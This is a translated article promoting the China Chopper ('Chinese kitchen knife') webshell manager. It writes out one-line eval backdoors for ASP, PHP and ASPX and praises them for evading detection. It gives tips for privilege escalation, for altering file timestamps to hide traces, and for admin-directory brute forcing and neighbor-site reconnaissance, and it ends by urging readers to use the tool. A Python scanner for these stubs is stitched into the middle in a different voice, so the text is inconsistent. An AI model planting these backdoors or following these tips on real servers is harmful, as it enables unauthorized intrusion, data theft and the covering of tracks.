Chinese kitchen knife and usage
ASP environment: <%eval request("A")%>
PHP environment: <?php @eval($_POST['a']);?>
ASPX environment: <%@ Page Language="Jscript"%><%eval(Request.Item["A"],"unsafe");%>
Is it shocking? Incredible? Yes, that was my reaction too when I first came across it. Can these three statements, the well-known "Chinese kitchen knife", really replace the scripts and backdoors for hundreds of platforms and environments that I spent years collecting? As it turned out, I was wrong to doubt it. The Chinese kitchen knife not only replaces those backdoors, its functions go beyond what I imagined. Let me explain step by step.
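Seen from the defending side, the three stubs above share one shape: eval applied directly to a request parameter. The following added example (not part of the original article or the tool) matches that shape in files under a web root; the rule names, the extension list and the sample strings are assumptions constructed for illustration.

```python
import os
import re

# The page's three stub shapes; whitespace and case kept loose against re-spacing.
STUB_PATTERNS = {
    "asp-eval-request": re.compile(
        r"<%\s*(?:eval|execute)\s*\(?\s*request\s*\(", re.I),
    "php-eval-superglobal": re.compile(
        r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "aspx-jscript-unsafe-eval": re.compile(
        r'<%\s*eval\s*\(\s*Request\s*\.\s*Item\s*\[[^\]]*\]\s*,\s*"unsafe"', re.I),
}
SCRIPT_EXTS = {".asp", ".asa", ".php", ".phtml", ".aspx", ".ashx"}


def scan_text(text):
    """Return sorted (line_number, rule_name) pairs for every stub match."""
    hits = []
    for name, pattern in STUB_PATTERNS.items():
        for m in pattern.finditer(text):
            hits.append((text.count("\n", 0, m.start()) + 1, name))
    return sorted(hits)


def scan_tree(root):
    """Walk a web root and return {path: hits} for script files that match."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in SCRIPT_EXTS:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                findings[path] = hits
    return findings


# Constructed samples: the page's three stubs (one re-spaced) plus benign code.
SAMPLES = {
    "asp": '<%eval request("A")%>',
    "php": "<?php\n  @eval ( $_POST ['a'] ) ;\n?>",
    "aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["A"],"unsafe");%>',
    "benign": "<?php echo htmlspecialchars($_POST['a']); ?>",
}

if __name__ == "__main__":
    print({label: scan_text(body) for label, body in SAMPLES.items()})
```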
1. Starting with the basics: do your scripts often get detected and killed? Do they still get killed after you deform them? Once a script is killed on the server, the administrator finds out and your access is lost, which is enough to make you cry. The kitchen knife's one-sentence webshell avoids this problem: it is only one line of code and will never be scanned and killed.
2. Ever been frustrated by this? You upload your backdoor to the server and it renders beyond recognition: the frames are distorted, the text turns into boxes, and the menus do not work. This is caused by an incompatible system language. The kitchen knife is compiled in Unicode mode and supports multi-language input and display, so there is no compatibility problem at all.
3. Do you have a lot of webshells? Each time, you write them down in Notepad, and when you need one you spend half a day searching for it, which is tiring and frustrating. With the kitchen knife you can manage your webshells easily. All records are stored in an encrypted local database, and webshell classification is supported, so you can keep them well organized. The kitchen knife has a temporary lock function, so that nobody can use it while you are away from your computer, and also an encryption function: without the correct password, hoho, stealing your data is useless.
4. Now database management, the most powerful function of the kitchen knife. I am proficient in the mainstream databases of various platforms and have written this function to the fullest extent. It supports databases such as MySQL, MSSQL, Oracle, Informix, and Access. Supporting these databases is not the most important part; what matters is the powerful, user-friendly database operation interface: built-in common database statements, intuitive browsing of tables and columns, automatic display of table names, column names, and query statements, and many built-in custom functions, so that even newcomers who do not know databases can easily access the data in the database. Here is a tip for kitchen knife database management: for Access databases, in the kitchen knife's webshell operation interface, right-click the MDB file and click Access Management to go directly to the Access database operation interface!
5. Elevation of privilege is always the greatest concern with a webshell, and you cannot talk about elevation of privilege without talking about cmd execution on the webshell. Some friends do not know about the kitchen knife's custom cmd path function. There are two ways to set the specified cmd path. One is to enter setp D:\mongo.exe in the CMD operation interface, and then upload cmd.exe to the directory, right-click it and click virtual terminal to enter the command line with the custom cmd.exe path, which works the same way. Another tip for cmd: in the kitchen knife's command line you can use commands such as cd to change directory, which is convenient! In addition, the new version adds a frequently-used directory management function. You can add frequently-used directories, or directories useful for elevation of privilege, to the kitchen knife's menu, which makes elevation of privilege and daily work easier. Isn't that more powerful than script backdoors with fixed elevation directories? Haha.
6. The webshell file functions of the kitchen knife are also very user-friendly. The folder and file icons are fully modeled on Windows, and file date, file size, and file permissions are clear at a glance. Modifying the file time is especially convenient: right-click the file, choose to modify the file time, enter the time in the file time column, and press Enter; the modification is complete. Of course, file management in the kitchen knife also has new, delete, upload, download, and edit functions, which are all similar and will not be described in detail. One function should be highlighted, though: the directory cache. The kitchen knife caches all browsed webshell directories locally, which makes the next visit more convenient. Most importantly, if you lose your access one day, you at least still have the file directory structure of the other server to help with further penetration.
Now that the webshell script functions are covered, on to some kitchen knife functions that are distinctive and practical. The predecessor of the kitchen knife is the webshell manager. Combined with the strengths of several other tools such as the author's Web management software, it is a collection of killer tools.
1: Crawler. I like WVS very much; it is very powerful for web security. One feature I like in it is directory crawling, which lays out the file and directory structure of a web site in an intuitive form for convenient analysis. I was pleasantly surprised to find that the kitchen knife also has this function, called spider crawling.
Usage:
{Spider} {URL: http://www.xunest.com/}
Set crawling range
{Spider} {URL: http://www.xunest.com/} {range: xunest.com}
This is similar to the WVS function. Last time, when I uploaded a webshell image, I did not know which directory the script backdoor had been sent to. I found it with the kitchen knife's spider crawling function, which shows how powerful it is.
2: Side-note query. During penetration, going in through a neighboring site (side-noting) is critical; I do not know how many major websites have fallen through their neighbors. You have seen lookups of all the domain names on the same server, but have you seen lookups of the domain names in the same C segment?
Usage:
Check the domain names bound to a single IP address
{Reverse_ip} {URL: http://www.xunest.com/}
Scan the web servers open in the C segment and query their bound domain names
{Reverse_ip_c} {URL: http://www.xunest.com/}
3: Dictionary cracking. Do you like the directory scanning function of WebTool? Since the kitchen knife gathers all these tools together, this function is naturally not missing, and it is more powerful.
Usage:
{Crack} {URL: http://%s/admin/} {flag: HTTP/1.1 200} {dict: list.txt}
{Crack} {URL: http://%s/admin/} {flag: !!HTTP/1.1 404} {dict: list.txt}
{Crack} {URL: http://www.xunest.com/%s/} {flag: successfully} {dict: list.txt}
%s is replaced by one row from dict. flag: is followed by a specific keyword in the returned data (including the HTTP header). With a leading !!, the result is true when the data does not contain the keyword; otherwise it is true when the data contains the keyword. list.txt is a file in the current directory and can also be set to an absolute path. Note: do not include too many rows.
The directory brute-force cracking function is flexible and powerful. First, you can determine whether a directory exists based on the returned data; you can also crack the parent directory of a known directory. For example, if you know that a directory is named guanli but do not know which directory the guanli directory is in, you can use:
{Crack} {URL: http://www.xunest.com/%s/guanli/} {flag: HTTP/1.1 200} {dict: list.txt}
Actually, the kitchen knife is also a browser... really, I am not kidding. The browser function of the kitchen knife is very simple but very practical. You can conveniently disable or enable website scripts and control execution, and toggle image display; most conveniently, and also very importantly, cookies can be edited. The kitchen knife's browser can also submit directly by POST. What is that good for? I believe I do not need to say. Another feature is custom JS, which is also said to be very powerful, but I have not used it yet.
To sum up, the kitchen knife has kept improving, updating, and developing, and by now it is not just a webshell manager. It can be called a collection of killer tools. Even with the webshell management function abandoned entirely, the kitchen knife is still a very good browser, a very good admin-backend scanning tool, a very good cookie editing and submission tool, a very good file management tool, and a very good side-note tool. It is convenient not only for hackers and friends but also for webmasters; after all, its file management and upload and download functions are more intuitive and important than FTP. It is truly unprecedented and unmatched. We strongly recommend that you use it.
According to the next development plan provided by the author, the kitchen knife will support JSP, CFM, and so on, and become more flexible. We are also considering opening the kitchen knife protocol and interface, so that you can write plug-ins freely and are not limited to a backdoor like eval. In addition, the kitchen knife will continue to be people-oriented and user-friendly. You are welcome to give your comments.
The Chinese kitchen knife official website has the details of the software, and the latest version can be downloaded there.